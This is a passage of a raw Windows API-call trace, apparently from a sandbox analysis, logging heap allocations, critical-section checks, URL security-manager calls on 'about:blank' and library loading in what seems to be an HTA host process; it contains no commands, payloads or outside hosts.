[0130.875] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.875] malloc (_Size=0xac) returned 0xbf89d8 [0130.875] memcpy_s (in: _Destination=0xd32000, _DestinationSize=0x158, _Source=0x19e680, _SourceSize=0x158 | out: _Destination=0xd32000) returned 0x0 [0130.896] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.896] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.896] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.896] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.897] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.897] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.897] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.897] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.897] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.897] malloc (_Size=0x180) returned 0xbf8a90 [0130.897] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.898] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.899] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.900] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.901] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.901] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.901] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.942] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.942] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.942] malloc (_Size=0xa8) returned 0xbf8c18 [0130.942] GetCurrentThreadId () returned 0xb48 [0130.942] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.942] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0130.943] CreateUri (in: pwzURI="about:blank", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19ea7c | out: ppURI=0x19ea7c*=0x5f59d4) returned 0x0 [0130.943] IUri:GetPropertyDWORD (in: This=0x5f59d4, uriProp=0x11, pdwProperty=0x19ea4c, dwFlags=0x0 | out: pdwProperty=0x19ea4c*=0x11) returned 0x0 [0130.944] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x19ea1c, dwReserved=0x0 | out: ppSM=0x19ea1c*=0x5f0b00) returned 0x0 [0130.944] IUnknown:QueryInterface (in: This=0x5f0b00, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x19ea20 | out: ppvObject=0x19ea20*=0x5f0b00) returned 0x0 [0130.954] IUnknown:Release (This=0x5f0b00) returned 0x1 [0130.955] IInternetSecurityManager:SetSecuritySite (This=0x5f0b00, pSite=0xd10de4) returned 0x0 [0130.955] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0130.956] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0130.956] GetProcAddress (hModule=0x703b0000, lpProcName=0x208) returned 0x70409f50 [0130.956] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19e9bc | out: lpflOldProtect=0x19e9bc*=0x4) returned 1 [0130.976] DllGetClassObject (in: rclsid=0x5febd8*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x19d900*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19cf4c | out: ppv=0x19cf4c*=0x6e784fb0) returned 0x0 [0130.977] IUnknown:AddRef (This=0x6e784fb0) returned 0x1 [0130.977] IUnknown:QueryInterface (in: This=0x6e784fb0, riid=0x703b3cc8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19dbc0 | out: ppvObject=0x19dbc0*=0x6e784fb0) returned 0x0 [0130.977] IUnknown:Release (This=0x6e784fb0) returned 0x1 [0130.977] IUnknown:QueryInterface (in: This=0x6e784fb0, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19dd58 | out: ppvObject=0x19dd58*=0x6e784fbc) returned 0x0 [0130.978] IUnknown:Release (This=0x6e784fb0) returned 0x1 [0130.978] StrCmpICW (pszStr1="about:blank", pszStr2="about:blank") returned 0 [0130.978] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x602bd0 [0130.978] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602bd0 | out: hHeap=0x5e0000) returned 1 [0130.978] IUnknown:Release (This=0x6e784fbc) returned 0x1 [0130.979] DllGetClassObject (in: rclsid=0x5febd8*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x703b3cc8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19dd08 | out: ppv=0x19dd08*=0x6e784fb0) returned 0x0 [0130.979] IUnknown:QueryInterface (in: This=0x6e784fb0, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19dd5c | out: ppvObject=0x19dd5c*=0x6e784fbc) returned 0x0 [0130.979] IUnknown:Release (This=0x6e784fb0) returned 0x1 [0130.979] IInternetProtocolInfo:ParseUrl (in: This=0x6e784fbc, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x5fcde8, cchResult=0xc, pcchResult=0x19dd74, dwReserved=0x0 | out: pwzResult="", pcchResult=0x19dd74*=0x0) returned 0x800c0011 [0130.979] IUnknown:Release (This=0x6e784fbc) returned 0x1 [0131.014] IUnknown:Release (This=0x5f0b00) returned 0x1 [0131.014] IUnknown:Release (This=0x5f59d4) returned 0x3 [0131.014] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f6090 [0131.014] memcpy_s (in: _Destination=0x5f6090, _DestinationSize=0x10, _Source=0x19eae0, _SourceSize=0x10 | out: _Destination=0x5f6090) returned 0x0 [0131.014] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.014] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x19eab4, dwReserved=0x0 | out: ppSM=0x19eab4*=0x5f1080) returned 0x0 [0131.015] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f6348 [0131.015] memcpy_s (in: _Destination=0x5f6348, _DestinationSize=0x10, _Source=0x19eae0, _SourceSize=0x10 | out: _Destination=0x5f6348) returned 0x0 [0131.015] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.015] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0131.015] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.016] GetProcAddress (hModule=0x703b0000, lpProcName=0x1bc) returned 0x7041c930 [0131.016] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ec34 | out: lpflOldProtect=0x19ec34*=0x4) returned 1 [0131.016] IUnknown:Release (This=0x5f0b00) returned 0x1 [0131.017] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.017] malloc (_Size=0xb0) returned 0xbf8d50 [0131.018] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.018] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.018] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2000) returned 0x606f18 [0131.018] memcpy_s (in: _Destination=0x606f18, _DestinationSize=0x2000, _Source=0x19ec78, _SourceSize=0x4 | out: _Destination=0x606f18) returned 0x0 [0131.019] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0131.019] CreateUri (in: pwzURI="about:blank", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19eaa8 | out: ppURI=0x19eaa8*=0x5f59d4) returned 0x0 [0131.036] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0131.036] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.037] GetProcAddress (hModule=0x703b0000, lpProcName=0x209) returned 0x7040a7a0 [0131.037] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19e9d8 | out: lpflOldProtect=0x19e9d8*=0x4) returned 1 [0131.038] DllGetClassObject (in: rclsid=0x5febd8*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x703b3cc8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19dca0 | out: ppv=0x19dca0*=0x6e784fb0) returned 0x0 [0131.039] IUnknown:QueryInterface (in: This=0x6e784fb0, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19dcf0 | out: ppvObject=0x19dcf0*=0x6e784fbc) returned 0x0 [0131.039] IUnknown:Release (This=0x6e784fb0) returned 0x1 [0131.039] IInternetProtocolInfo:ParseUrl (in: This=0x6e784fbc, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x5fcde8, cchResult=0xc, pcchResult=0x19dd00, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x19dd00*=0xc) returned 0x0 [0131.039] StrCmpICW (pszStr1="about:blank", pszStr2="about:blank") returned 0 [0131.039] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x602ae0 [0131.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x602ae0 | out: hHeap=0x5e0000) returned 1 [0131.039] IUnknown:Release (This=0x6e784fbc) returned 0x1 [0131.040] DllGetClassObject (in: rclsid=0x5febd8*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x703b3cc8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19dca0 | out: ppv=0x19dca0*=0x6e784fb0) returned 0x0 [0131.040] IUnknown:QueryInterface (in: This=0x6e784fb0, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19dcf4 | out: ppvObject=0x19dcf4*=0x6e784fbc) returned 0x0 [0131.040] IUnknown:Release (This=0x6e784fb0) returned 0x1 [0131.040] IInternetProtocolInfo:ParseUrl (in: This=0x6e784fbc, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x5fcde8, cchResult=0xc, pcchResult=0x19dd0c, dwReserved=0x0 | out: pwzResult="", pcchResult=0x19dd0c*=0x0) returned 0x800c0011 [0131.040] IUnknown:Release (This=0x6e784fbc) returned 0x1 [0131.041] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0131.041] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0131.042] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x5f59d4, dwAction=0x2106, pPolicy=0x19ea9c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x19ea7c | out: pPolicy=0x19ea9c*=0x0, pdwOutFlags=0x19ea7c*=0x0) returned 0x0 [0131.042] IUnknown:Release (This=0x5f0b00) returned 0x1 [0131.042] IUnknown:Release (This=0x5f59d4) returned 0x4 [0131.042] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.043] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.043] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.043] GetDoubleClickTime () returned 0x1f4 [0131.043] GetSystemMetrics (nIndex=36) returned 4 [0131.043] GetSystemMetrics (nIndex=37) returned 4 [0131.043] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.044] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.044] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.044] RtlInitializeConditionVariable () returned 0xcf80b8 [0131.044] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.044] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.044] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.044] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.044] GetProcAddress (hModule=0x76da0000, lpProcName="CoTaskMemAlloc") returned 0x76df9ed0 [0131.045] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ee68 | out: lpflOldProtect=0x19ee68*=0x4) returned 1 [0131.045] CoTaskMemAlloc (cb=0x1c) returned 0x602bd0 [0131.045] QISearch (in: that=0xcf8120, pqit=0x6d729ed8, riid=0x6d729ee8*(Data1=0xaf11d3db, Data2=0x81a6, Data3=0x4b88, Data4=([0]=0xae, [1]=0x7, [2]=0x96, [3]=0xec, [4]=0xcf, [5]=0x46, [6]=0xd0, [7]=0x76)), ppv=0xd110b0 | out: that=0xcf8120, ppv=0xd110b0*=0xcf8120) returned 0x0 [0131.045] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.046] CoTaskMemAlloc (cb=0x1c) returned 0x602c48 [0131.046] QISearch (in: that=0xcf8150, pqit=0x6d729ed8, riid=0x6d729ee8*(Data1=0xaf11d3db, Data2=0x81a6, Data3=0x4b88, Data4=([0]=0xae, [1]=0x7, [2]=0x96, [3]=0xec, [4]=0xcf, [5]=0x46, [6]=0xd0, [7]=0x76)), ppv=0xd110b4 | out: that=0xcf8150, ppv=0xd110b4*=0xcf8150) returned 0x0 [0131.046] IUnknown:AddRef (This=0xcf8150) returned 0x2 [0131.046] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.046] malloc (_Size=0xac) returned 0xbf8e08 [0131.046] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.046] malloc (_Size=0xac) returned 0xbf8ec0 [0131.047] GetSystemTimeAdjustment (in: lpTimeAdjustment=0x19ee94, lpTimeIncrement=0x19ee9c, lpTimeAdjustmentDisabled=0x19ee98 | out: lpTimeAdjustment=0x19ee94, lpTimeIncrement=0x19ee9c, lpTimeAdjustmentDisabled=0x19ee98) returned 1 [0131.047] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.047] malloc (_Size=0xa8) returned 0xbf8f78 [0131.048] QueryPerformanceCounter (in: lpPerformanceCount=0x19ee4c | out: lpPerformanceCount=0x19ee4c*=3094986664803) returned 1 [0131.048] QueryPerformanceFrequency (in: lpFrequency=0x6e8990e8 | out: lpFrequency=0x6e8990e8*=100000000) returned 1 [0131.048] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.048] malloc (_Size=0xb8) returned 0xbf9028 [0131.048] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.048] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.048] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.049] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.050] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x46) returned 0x604700 [0131.050] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x42) returned 0x604750 [0131.050] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x56) returned 0x6047a0 [0131.050] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.050] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.051] malloc (_Size=0xa4) returned 0xbf90e8 [0131.051] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.052] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.053] IUnknown:Release (This=0x6e784a4c) returned 0x1 [0131.054] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.086] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.086] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x743f0000 [0131.087] GetProcAddress (hModule=0x743f0000, lpProcName=0x9) returned 0x74409570 [0131.087] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fd04 | out: lpflOldProtect=0x19fd04*=0x4) returned 1 [0131.087] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.087] LoadLibraryExA (lpLibFileName="api-ms-win-downlevel-shlwapi-l2-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x77180000 [0131.088] GetProcAddress (hModule=0x77180000, lpProcName="IUnknown_QueryService") returned 0x771bfc30 [0131.088] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19fd20 | out: lpflOldProtect=0x19fd20*=0x4) returned 1 [0131.088] IUnknown_QueryService (in: punk=0x6e8967a4, guidService=0x6d6f65d4*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6d720fb8*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0xd10060 | out: ppvOut=0xd10060*=0x0) returned 0x80004005 [0131.088] IUnknown:QueryInterface (in: This=0x6e8967a4, riid=0x77188260*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19fd80 | out: ppvObject=0x19fd80*=0x6e8967b8) returned 0x0 [0131.089] IServiceProvider:QueryService (in: This=0x6e8967b8, guidService=0x6d6f65d4*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6d720fb8*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0xd10060 | out: ppvObject=0xd10060*=0x0) returned 0x80004005 [0131.089] IUnknown:Release (This=0x6e8967b8) returned 0x1 [0131.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.185] IUnknown_QueryService (in: punk=0x6e8967a4, guidService=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), riid=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), ppvOut=0x19fd9c | out: ppvOut=0x19fd9c*=0x0) returned 0x80004005 [0131.185] IUnknown:QueryInterface (in: This=0x6e8967a4, riid=0x77188260*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19fd70 | out: ppvObject=0x19fd70*=0x6e8967b8) returned 0x0 [0131.185] IServiceProvider:QueryService (in: This=0x6e8967b8, guidService=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), riid=0x6d6f6740*(Data1=0x25336920, Data2=0x3f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x68, [6]=0x6f, [7]=0x13)), ppvObject=0x19fd9c | out: ppvObject=0x19fd9c*=0x0) returned 0x80004005 [0131.185] IUnknown:Release (This=0x6e8967b8) returned 0x1 [0131.186] IInternetSecurityManager:SetSecuritySite (This=0x5f0b00, pSite=0xd10de4) returned 0x0 [0131.186] IUnknown:Release (This=0xd10de4) returned 0x0 [0131.186] IUnknown:AddRef (This=0xd10de4) returned 0x30 [0131.186] IUnknown:QueryInterface (in: This=0xd10de4, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19fdac | out: ppvObject=0x19fdac*=0xd10de8) returned 0x0 [0131.186] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x5f0b34 | out: ppvObject=0x5f0b34*=0x0) returned 0x80004002 [0131.186] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x5f0b30 | out: ppvObject=0x5f0b30*=0x0) returned 0x80004002 [0131.186] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x5f0b2c | out: ppvObject=0x5f0b2c*=0x0) returned 0x80004002 [0131.186] IServiceProvider:QueryService (in: This=0xd10de8, guidService=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5f0b28 | out: ppvObject=0x5f0b28*=0x6e8967bc) returned 0x0 [0131.186] IUnknown:Release (This=0xd10de8) returned 0x0 [0131.187] CoTaskMemAlloc (cb=0x6d) returned 0x604800 [0131.187] CoTaskMemAlloc (cb=0x9) returned 0x5f61e0 [0131.371] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x5f60c0 [0131.388] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.392] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0131.392] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.392] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x5f6360 [0131.392] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.392] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.392] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.393] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.393] memcpy_s (in: _Destination=0xd0e230, _DestinationSize=0x8, _Source=0x5f60c4, _SourceSize=0x6 | out: _Destination=0xd0e230) returned 0x0 [0131.393] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.393] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.394] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.394] RtlTryEnterCriticalSection 